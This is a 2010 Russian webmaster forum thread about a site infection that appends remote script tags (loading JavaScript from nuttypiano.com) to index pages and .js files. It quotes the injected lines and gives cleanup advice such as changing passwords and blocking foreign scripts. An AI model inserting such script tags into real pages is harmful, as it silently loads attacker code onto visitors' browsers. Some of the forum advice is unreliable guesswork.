|
|
|
| За последнее время на 2 сайтах выводил вирус, который прописывается в страницах Index и в файлах *.js в самом конце.
<script type="text/javascript" src="http://nuttypiano.com/Hard_Disk.js"></script>
<!--4cc4fb6d72253db241b7bc525ee3babe-->
|
Вместо "http://nuttypiano.com/Hard_Disk.js" могут быть разные ссылки.
Кто-нибудь выводил эту заразу? Как победили. Я поудалял этот код, но опять появилось, правда я пароли не менял еще. | |
|
|
|
|
|
|
|
для: nameIvan
(26.08.2010 в 13:33)
| | Если вирус вставляет только адрес скрипта, то можно запретить подключения скриптов с чужого хоста. Делается это наверное в .htaccess
А если вирус вставляет сам скрипт (что просто странно), то не знаю.
От чего вы не меняли пароли? | |
|
|
|
|
|
|
|
для: lElectroHardl
(26.08.2010 в 13:54)
| | В страницу вставляется только ссылка на сайт. При загрузке страницы подгружается левый сайт, на него антивирь и ругается.
Пароли не сменил, потому что оторвали от компа и забыл поменять. | |
|
|
|
|
|
|
|
для: nameIvan
(26.08.2010 в 13:58)
| | Total commander используете? | |
|
|
|
|
|
|
|
для: Axxil
(26.08.2010 в 14:07)
| | Да, в нем не стоит галочка Запомнить пароль. | |
|
|
|
|
|
|
|
для: nameIvan
(26.08.2010 в 14:09)
| | Вам нужно запретить все, что приходит с других хотсов. надеюсь поможет. | |
|
|
|
|
|
|
|
для: nameIvan
(26.08.2010 в 14:09)
| | Это не важно. Он сам по себе дырявый. Была у меня такая напасть пару лет назад, total снёс - всё прекратилось. | |
|
|
|
|
|
|
|
для: nameIvan
(26.08.2010 в 13:33)
| | У меня пару дней назад случилась такая бяка, скрипт появился после тега
</html>
<script type="text/javascript" src="http://nuttypiano.com/Debug.js"></script>
<!--eb6851b3939aaca2dcdd7584ba19ccdf-->
Удалили эту строчку, пока тьфу-тьфу-тьфу всё ОК.
А расскажите поподробнее, что сделать чтобы подобного не возникало?
Друг говорит, что есть два варианта:
- либо хакнули баннерную сеть каталога, баннер которого размещён на глав.странице сайта
- либо хакнули хост-провайдера
Склоняюсь к первому варианту. | |
|
|
|
|
|
|
|
для: Helen_rr
(28.08.2010 в 14:43)
| | Вот вы удалил этот тег. И? Что мешает его туда опять вставить (тому, его туда в 1-й раз вставил)?
Такие вещи нужно резать на корню! А не "тьфу-тьфу, надеюсь пронесет". | |
|
|
|
|
|
|
|
для: lElectroHardl
(28.08.2010 в 17:50)
| | вот я и спрашиваю - как?! менять явки-пароли... что? | |
|
|
|
|
|
|
|
для: Helen_rr
(29.08.2010 в 17:04)
| | 1. 2-е сообщение (от меня) прочти.
2. Изменить все пароли.
3. Потратить день на нахождения иных "дыр".
4. Исправить все дыры.
А еще лучше, написать в Free-Lance с просьбой: "Нужен краш-тест безопасности сайта". Твой сайт взломают (где это возможно), скажут какие дыры они нашли, ты их исправишь.
Может идея бредовая, но думаю поможет. | |
|
|
|